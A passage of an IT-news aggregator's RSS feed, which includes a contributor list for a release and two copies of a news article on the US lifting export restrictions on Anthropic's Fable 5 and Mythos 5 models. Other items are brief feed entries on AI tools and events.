<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/infinitycrew39/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/infinitycrew39">@infinitycrew39</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ipriyaaanshu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ipriyaaanshu">@ipriyaaanshu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/isair/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/isair">@isair</a>, @islam666, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itenev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itenev">@itenev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsflownium/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsflownium">@itsflownium</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/izumi0uu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/izumi0uu">@izumi0uu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaaneek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaaneek">@Jaaneek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JabberELF/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JabberELF">@JabberELF</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackjin1997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackjin1997">@jackjin1997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackroofan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackroofan">@jackroofan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/janrenz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/janrenz">@janrenz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jasnoorgill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jasnoorgill">@jasnoorgill</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jasonQin6/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jasonQin6">@jasonQin6</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcjc81/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcjc81">@jcjc81</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jearnest11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jearnest11">@jearnest11</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeeves-assistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeeves-assistant">@jeeves-assistant</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jeffgithub0029/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jeffgithub0029">@Jeffgithub0029</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrobodie-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrobodie-glitch">@jeffrobodie-glitch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JezzaHehn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JezzaHehn">@JezzaHehn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jimmyjohansson84/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jimmyjohansson84">@jimmyjohansson84</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmmaloney4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmmaloney4">@jmmaloney4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jnibarger01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jnibarger01">@jnibarger01</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jplew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jplew">@jplew</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Junass1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Junass1">@Junass1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justemu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justemu">@justemu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justin-cyhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justin-cyhuang">@justin-cyhuang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JustinOhms/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JustinOhms">@JustinOhms</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jvradahellys24-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jvradahellys24-art">@jvradahellys24-art</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kailigithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kailigithub">@Kailigithub</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaishi00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaishi00">@kaishi00</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kangsoo-bit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kangsoo-bit">@kangsoo-bit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kartik-mem0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kartik-mem0">@kartik-mem0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keiravoss94/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keiravoss94">@keiravoss94</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kenyonxu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kenyonxu">@kenyonxu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kernel-t1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kernel-t1">@kernel-t1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kewe63/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kewe63">@Kewe63</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeyArgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeyArgo">@KeyArgo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KiruyaMomochi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KiruyaMomochi">@KiruyaMomochi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn8-codes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn8-codes">@kn8-codes</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kolektori/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kolektori">@Kolektori</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konsisumer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konsisumer">@konsisumer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kyssta-exe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kyssta-exe">@kyssta-exe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kyzcreig/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kyzcreig">@Kyzcreig</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lazymonter/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lazymonter">@Lazymonter</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LehaoLin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LehaoLin">@LehaoLin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, @lEWFkRAD,<br>
@libre-7, @LIC99, @LifeJiggy, @linyubin, @liuhao1024, @lkevincc0, @lkz-de, @loes5050, @londo161, @lubosxyz,<br>
@m24927605, @MaheshtheDev, @manus-use, @marco0158, @MarioYounger, @martinramos002-bot, @MattKotsenas,<br>
@max-chen, @MaxFreedomPollard, @maxmilian, @maxpetrusenko, @memosr, @Mibayy, @Minksgo, @mintybasil, @mkslzk,<br>
@mohamedorigami-jpg, @MorAlekss, @mrparker0980, @ms-alan, @namredips, @nankingjing, @natehale, @necoweb3,<br>
@neo-2026, @Nickperillo, @nightq, @nikshepsvn, @nnnet, @nocturnum91, @nodejun, @NousResearch, @nycomar,<br>
@OmarB97, @orbisai0security, @oreoluwa, @outsourc-e, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, @p-andhika, @panghuer023, @Paperclip,<br>
@peetwan, @pefontana, @petrichor-op, @pinguarmy, @PINKIIILQWQ, @pmos69, @PolyphonyRequiem, @pprism13,<br>
@PRATHAMESH75, @professorpalmer, @pyxl-dev, @Que0x, @qWaitCrypto, @r266-tech, @RafaelMiMi, @Railway9784,<br>
@randomuser2026x, @rayjun, @rc-int, @rebel0789, @redactdeveloper, @riyas22, @rlaope, @rob-maron, @rodboev,<br>
@rodrigoeqnit, @rratmansky, @rrevenanttt, @ruangraung, @Ruzzgar, @ryo-solo, @s010mn, @Sahil-SS9,<br>
@SahilRakhaiya05, @SandroHub013, @Sanjays2402, @sasquatch9818, @ScotterMonk, @season179, @sgabel, @sgaofen,<br>
@sgtworkman, @shandian64, @shannonsands, @shashwatgokhe, @shawchanshek, @sherman-yang, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @SidUParis,<br>
@SimoKiihamaki, @simpolism, @sjh9714, @skabartem, @skyc1e, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slawt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slawt">@slawt</a>, @soynchux, @spiky02plateau, @spjoes,<br>
@sprmn24, @srojk34, @stepanov1975, @steveonjava, @Subway2023, @sweetcornna, @swissly, @Sworntech-dev,<br>
@syahidfrd, @synapsesx, @szzhoujiarui-sketch, @talmax1124, @telos-oc, @testingbuddies24, @texhy, @tgmerritt,<br>
@theAgenticBuilder, @thestral123, @tkwong, @Tortugasaur, @Tranquil-Flow, @trevorgordon981, @truenorth-lj,<br>
@tt-a1i, @tuancookiez-hub, @TutkuEroglu, @tymrtn, @udatny, @UgwujaGeorge, @underthestars-zhy, @uperLu,<br>
@uzunkuyruk, @valenteff, @valentt, @vanthinh6886, @Versun, @victor-kyriazakos, @virtuadex, @vKongv,<br>
@w31rdm4ch1nZ, @weidzhou, @wgu9, @whoislikemiha, @wnuuee1, @woaini30050, @WuKongAI-CMU, @WuTianyi123, @WXBR,<br>
@x7peeps, @x9x9x9x9x9x91, @Xowiek, @xxchan, @xxxigm, @xydigit-zt, @yapsrubricsz0, @yashiels, @yeyitech, @ygd58,<br>
@YLChen-007, @yong2bba, @yoniebans, @ypwcharles, @yu-xin-c, @yungchentang, @yusekiotacode, @YuShu, @yyzquwu,<br>
@zapabob, @zccyman, @zeapsu, @zmlgit, @znding04, @Zyxxx-xxxyZ</p>
<p>Also: Lucas Nicolas.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.6.19...v2026.7.1">v2026.6.19...v2026.7.1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Les clés du déploiement de l'IA à grande échelle : la synchronisation des serveurs, du stockage et des réseaux]]></title>
<description><![CDATA[Le passage à l'échelle de l'IA ne se résume pas à l'ajout de GPU. Les entreprises doivent harmoniser les serveurs, le stockage, le réseau, l'accès aux données et l'orchestration pour que les charges de travail en production puissent croître sans créer de goulets d'étranglement coûteux.]]></description>
<link>https://tsecurity.de/de/3639402/it-nachrichten/les-cls-du-dploiement-de-lia-grande-chelle-la-synchronisation-des-serveurs-du-stockage-et-des-rseaux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639402/it-nachrichten/les-cls-du-dploiement-de-lia-grande-chelle-la-synchronisation-des-serveurs-du-stockage-et-des-rseaux/</guid>
<pubDate>Wed, 01 Jul 2026 20:16:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Le passage à l'échelle de l'IA ne se résume pas à l'ajout de GPU. Les entreprises doivent harmoniser les serveurs, le stockage, le réseau, l'accès aux données et l'orchestration pour que les charges de travail en production puissent croître sans créer de goulets d'étranglement coûteux.]]></content:encoded>
</item>
<item>
<title><![CDATA[Builders Stage agenda revealed: Practical strategies for scaling startups at TechCrunch Disrupt 2026]]></title>
<description><![CDATA[The Builders Stage is returning to TechCrunch Disrupt 2026, bringing together 10,000+ founders, startup operators, and investors for practical conversations. and Q&A on what it takes to build and scale successful companies. Register now to save up to $330.]]></description>
<link>https://tsecurity.de/de/3638723/it-nachrichten/builders-stage-agenda-revealed-practical-strategies-for-scaling-startups-at-techcrunch-disrupt-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638723/it-nachrichten/builders-stage-agenda-revealed-practical-strategies-for-scaling-startups-at-techcrunch-disrupt-2026/</guid>
<pubDate>Wed, 01 Jul 2026 16:02:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Builders Stage is returning to TechCrunch Disrupt 2026, bringing together 10,000+ founders, startup operators, and investors for practical conversations. and Q&amp;A on what it takes to build and scale successful companies. Register now to save up to $330.]]></content:encoded>
</item>
<item>
<title><![CDATA[5 AI Coding Platforms to Build Apps Without the Headache]]></title>
<description><![CDATA[Explore the best AI coding platforms, no-code app builders, and vibe coding tools that help beginners and developers build, test, and deploy full-stack apps using simple prompts.]]></description>
<link>https://tsecurity.de/de/3638502/ai-nachrichten/5-ai-coding-platforms-to-build-apps-without-the-headache/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638502/ai-nachrichten/5-ai-coding-platforms-to-build-apps-without-the-headache/</guid>
<pubDate>Wed, 01 Jul 2026 14:18:29 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Explore the best AI coding platforms, no-code app builders, and vibe coding tools that help beginners and developers build, test, and deploy full-stack apps using simple prompts.]]></content:encoded>
</item>
<item>
<title><![CDATA[US reverses export restrictions on Anthropic’s Fable 5, Mythos 5 AI models]]></title>
<description><![CDATA[The US government has reversed export restrictions on Anthropic’s frontier AI models Fable 5 and Mythos 5, allowing the company to resume global access after nearly three weeks of disruption triggered by concerns over the models’ cybersecurity capabilities.



“As of today, June 30, the export co...]]></description>
<link>https://tsecurity.de/de/3638243/it-nachrichten/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638243/it-nachrichten/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models/</guid>
<pubDate>Wed, 01 Jul 2026 13:18:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The US government has reversed export restrictions on Anthropic’s frontier AI models Fable 5 and Mythos 5, allowing the company to resume global access after nearly three weeks of disruption triggered by concerns over the models’ cybersecurity capabilities.</p>



<p>“As of today, June 30, the export controls on Fable 5 and Mythos 5 have been lifted,” Anthropic said in a <a href="https://www.anthropic.com/news/redeploying-fable-5" target="_blank" rel="nofollow">blog post</a>. The company said Fable 5 will begin rolling out globally on July 1 across Claude Platform, Claude.ai, Claude Code and Claude Cowork, while access on Amazon Web Services, Google Cloud, and Microsoft Foundry will be restored “as quickly as possible.”</p>



<p>Commerce Secretary Howard Lutnick said the administration had worked with Anthropic before reversing the restrictions.</p>



<p>“Over the past two weeks, we have worked closely with Anthropic to analyze and approve Fable 5 to ensure alignment across the US Government and strengthen America’s leadership in AI,” <a href="https://x.com/howardlutnick/status/2072100729603452965" target="_blank" rel="nofollow">Lutnick wrote</a> in a post on X.</p>



<p>Anthropic had <a href="https://www.csoonline.com/article/4183094/anthropic-releases-mythos-class-fable-5-model-with-safeguards-for-cyber-risks.html">launched</a> Fable 5 and Mythos 5 on June 9, and the US authorities restricted their export on June 12.</p>



<p>The Anthropic decision comes as other frontier AI developers are also operating under closer government scrutiny.</p>



<p>In announcing GPT-5.6 Sol, Terra, and Luna last week, <a href="https://openai.com/index/previewing-gpt-5-6-sol/" target="_blank" rel="nofollow">OpenAI said</a> it had previewed both its rollout plans and the model’s capabilities to the US government before launch and, “at their request,” was initially making the model available only to “a small group of trusted partners” whose participation had been shared with the government.</p>



<p>OpenAI said it would continue coordinating with government partners before expanding availability, but added that it did not believe “this kind of government access process should become the long-term default” because it keeps advanced AI tools from “users, developers, enterprises, cyber defenders, and global partners who need them.”</p>



<p>Analysts say the Anthropic decision reflects a broader shift in how frontier AI models are governed.</p>



<p>“The reversal is not the story; the instrument beneath it is,” said Sanchit Vir Gogia, chief analyst at Greyhound Research. Washington, he said, has applied the long-standing “deemed export” doctrine to frontier AI models, signalling “negotiated oversight, conditional and monitored, rather than blanket prohibition.”</p>



<h2 class="wp-block-heading">Immediate order created global disruption</h2>



<p>Anthropic said the <a href="https://www.cio.com/article/4185175/anthropic-locks-enterprises-out-of-fable-and-mythos-following-government-order.html">June 12 export controls</a> required it to restrict access to foreign nationals.</p>



<p>“Because the order took effect immediately and we had no reliable way to verify nationality in real-time, we suspended access to both models for all users,” it added. The company partially restored Mythos 5 last week for a limited group of US organizations.</p>



<p>Anthropic said the restrictions followed a report from Amazon researchers describing a technique that bypassed one of Fable 5’s cybersecurity safeguards. After reviewing the findings with Amazon and the US government, the company concluded the technique “did not expose any unique Mythos-level cyber capabilities” and instead represented “a borderline case for Fable 5’s safeguards.”</p>



<p>It subsequently retrained its safety classifier, saying the reported technique is now blocked in more than 99% of cases, while acknowledging that the stronger protections would increase false positives for some legitimate coding requests. Researchers at the US Department of Commerce’s Center for AI Standards and Innovation also evaluated the updated safeguards, Anthropic said.</p>



<h2 class="wp-block-heading">Enterprises face a new continuity risk</h2>



<p>Experts say the episode demonstrates that frontier AI’s availability can now be shaped by policy decisions as much as technical capability.</p>



<p>“Frontier access has become conditional infrastructure,” Gogia said. “The models went dark globally because nationality could not be verified in real time, so a control aimed at foreign nationals became an outage for everyone.”</p>



<p>He said enterprises should also not assume that deploying models across multiple cloud providers insulates them from regulatory actions affecting the underlying model provider.</p>



<p>According to Gogia, organizations should begin evaluating frontier AI platforms for regulatory interruption, cross-border identity restrictions, channel restoration delays, and trusted-partner eligibility alongside traditional security, commercial, and technical considerations.</p>



<h2 class="wp-block-heading">Anthropic proposes a common jailbreak framework</h2>



<p>Anthropic used the announcement to call for an industry-wide framework to assess AI jailbreaks, saying developers and governments currently lack a common standard for evaluating newly discovered techniques.</p>



<p>“There’s currently no consensus in the AI industry on how to describe, in objective terms, the severity of an AI jailbreak,” the company said. Anthropic said it is working with Amazon, Microsoft, Google, and other Project Glasswing partners on a framework for evaluating jailbreaks, while also expanding collaboration with the US government through pre-release testing of future frontier models, information sharing, and joint AI security research.</p>



<p>“Government involvement in AI releases requires a durable, transparent process that gives cyber defenders and others the certainty they need about access to powerful models,” Anthropic said. “These rules should be codified in strong regulation and applied equally across frontier model developers.”</p>



<p>Gogia said the broader lesson extends beyond Anthropic’s restored access. “Restored access is not restored certainty,” Gogia said. “Build for the detour, because the road now runs through policy.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[US reverses export restrictions on Anthropic’s Fable 5, Mythos 5 AI models]]></title>
<description><![CDATA[The US government has reversed export restrictions on Anthropic’s frontier AI models Fable 5 and Mythos 5, allowing the company to resume global access after nearly three weeks of disruption triggered by concerns over the models’ cybersecurity capabilities.



“As of today, June 30, the export co...]]></description>
<link>https://tsecurity.de/de/3638240/it-nachrichten/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638240/it-nachrichten/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models/</guid>
<pubDate>Wed, 01 Jul 2026 13:18:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The US government has reversed export restrictions on Anthropic’s frontier AI models Fable 5 and Mythos 5, allowing the company to resume global access after nearly three weeks of disruption triggered by concerns over the models’ cybersecurity capabilities.</p>



<p>“As of today, June 30, the export controls on Fable 5 and Mythos 5 have been lifted,” Anthropic said in a <a href="https://www.anthropic.com/news/redeploying-fable-5" target="_blank" rel="noreferrer noopener">blog post</a>. The company said Fable 5 will begin rolling out globally on July 1 across Claude Platform, Claude.ai, Claude Code and Claude Cowork, while access on Amazon Web Services, Google Cloud, and Microsoft Foundry will be restored “as quickly as possible.”</p>



<p>Commerce Secretary Howard Lutnick said the administration had worked with Anthropic before reversing the restrictions.</p>



<p>“Over the past two weeks, we have worked closely with Anthropic to analyze and approve Fable 5 to ensure alignment across the US Government and strengthen America’s leadership in AI,” <a href="https://x.com/howardlutnick/status/2072100729603452965" target="_blank" rel="noreferrer noopener">Lutnick wrote</a> in a post on X.</p>



<p>Anthropic had <a href="https://www.csoonline.com/article/4183094/anthropic-releases-mythos-class-fable-5-model-with-safeguards-for-cyber-risks.html">launched</a> Fable 5 and Mythos 5 on June 9, and the US authorities restricted their export on June 12.</p>



<p>The Anthropic decision comes as other frontier AI developers are also operating under closer government scrutiny.</p>



<p>In announcing GPT-5.6 Sol, Terra, and Luna last week, <a href="https://openai.com/index/previewing-gpt-5-6-sol/" target="_blank" rel="noreferrer noopener">OpenAI said</a> it had previewed both its rollout plans and the model’s capabilities to the US government before launch and, “at their request,” was initially making the model available only to “a small group of trusted partners” whose participation had been shared with the government.</p>



<p>OpenAI said it would continue coordinating with government partners before expanding availability, but added that it did not believe “this kind of government access process should become the long-term default” because it keeps advanced AI tools from “users, developers, enterprises, cyber defenders, and global partners who need them.”</p>



<p>Analysts say the Anthropic decision reflects a broader shift in how frontier AI models are governed.</p>



<p>“The reversal is not the story; the instrument beneath it is,” said Sanchit Vir Gogia, chief analyst at Greyhound Research. Washington, he said, has applied the long-standing “deemed export” doctrine to frontier AI models, signalling “negotiated oversight, conditional and monitored, rather than blanket prohibition.”</p>



<h2 class="wp-block-heading">Immediate order created global disruption</h2>



<p>Anthropic said the <a href="https://www.cio.com/article/4185175/anthropic-locks-enterprises-out-of-fable-and-mythos-following-government-order.html">June 12 export controls</a> required it to restrict access to foreign nationals.</p>



<p>“Because the order took effect immediately and we had no reliable way to verify nationality in real-time, we suspended access to both models for all users,” it added. The company partially restored Mythos 5 last week for a limited group of US organizations.</p>



<p>Anthropic said the restrictions followed a report from Amazon researchers describing a technique that bypassed one of Fable 5’s cybersecurity safeguards. After reviewing the findings with Amazon and the US government, the company concluded the technique “did not expose any unique Mythos-level cyber capabilities” and instead represented “a borderline case for Fable 5’s safeguards.”</p>



<p>It subsequently retrained its safety classifier, saying the reported technique is now blocked in more than 99% of cases, while acknowledging that the stronger protections would increase false positives for some legitimate coding requests. Researchers at the US Department of Commerce’s Center for AI Standards and Innovation also evaluated the updated safeguards, Anthropic said.</p>



<h2 class="wp-block-heading">Enterprises face a new continuity risk</h2>



<p>Experts say the episode demonstrates that frontier AI’s availability can now be shaped by policy decisions as much as technical capability.</p>



<p>“Frontier access has become conditional infrastructure,” Gogia said. “The models went dark globally because nationality could not be verified in real time, so a control aimed at foreign nationals became an outage for everyone.”</p>



<p>He said enterprises should also not assume that deploying models across multiple cloud providers insulates them from regulatory actions affecting the underlying model provider.</p>



<p>According to Gogia, organizations should begin evaluating frontier AI platforms for regulatory interruption, cross-border identity restrictions, channel restoration delays, and trusted-partner eligibility alongside traditional security, commercial, and technical considerations.</p>



<h2 class="wp-block-heading">Anthropic proposes a common jailbreak framework</h2>



<p>Anthropic used the announcement to call for an industry-wide framework to assess AI jailbreaks, saying developers and governments currently lack a common standard for evaluating newly discovered techniques.</p>



<p>“There’s currently no consensus in the AI industry on how to describe, in objective terms, the severity of an AI jailbreak,” the company said. Anthropic said it is working with Amazon, Microsoft, Google, and other Project Glasswing partners on a framework for evaluating jailbreaks, while also expanding collaboration with the US government through pre-release testing of future frontier models, information sharing, and joint AI security research.</p>



<p>“Government involvement in AI releases requires a durable, transparent process that gives cyber defenders and others the certainty they need about access to powerful models,” Anthropic said. “These rules should be codified in strong regulation and applied equally across frontier model developers.”</p>



<p>Gogia said the broader lesson extends beyond Anthropic’s restored access. “Restored access is not restored certainty,” Gogia said. “Build for the detour, because the road now runs through policy.”</p>



<p><em>The article originally appeared on <a href="https://www.cio.com/article/4191550/us-reverses-export-restrictions-on-anthropics-fable-5-mythos-5-ai-models.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is an AI agent builder? And why should businesses consider using it?]]></title>
<description><![CDATA[A plain-English guide to what AI agent builders are, how they work, and why more businesses are turning to them to automate real work, not just chat.]]></description>
<link>https://tsecurity.de/de/3636729/it-nachrichten/what-is-an-ai-agent-builder-and-why-should-businesses-consider-using-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636729/it-nachrichten/what-is-an-ai-agent-builder-and-why-should-businesses-consider-using-it/</guid>
<pubDate>Tue, 30 Jun 2026 21:47:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A plain-English guide to what AI agent builders are, how they work, and why more businesses are turning to them to automate real work, not just chat.]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Nvidia exec on how ‘confidential computing’ can secure AI agents]]></title>
<description><![CDATA[There are a variety of security concerns about artificial intelligence (AI), especially when it comes to the behavior of agentic AI. But until recently, the concept of locking down the models to prevent tampering hasn’t gotten a lot of attention.



Now, a security technology called “confidential...]]></description>
<link>https://tsecurity.de/de/3635202/ai-nachrichten/qa-nvidia-exec-on-how-confidential-computing-can-secure-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635202/ai-nachrichten/qa-nvidia-exec-on-how-confidential-computing-can-secure-ai-agents/</guid>
<pubDate>Tue, 30 Jun 2026 12:18:55 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



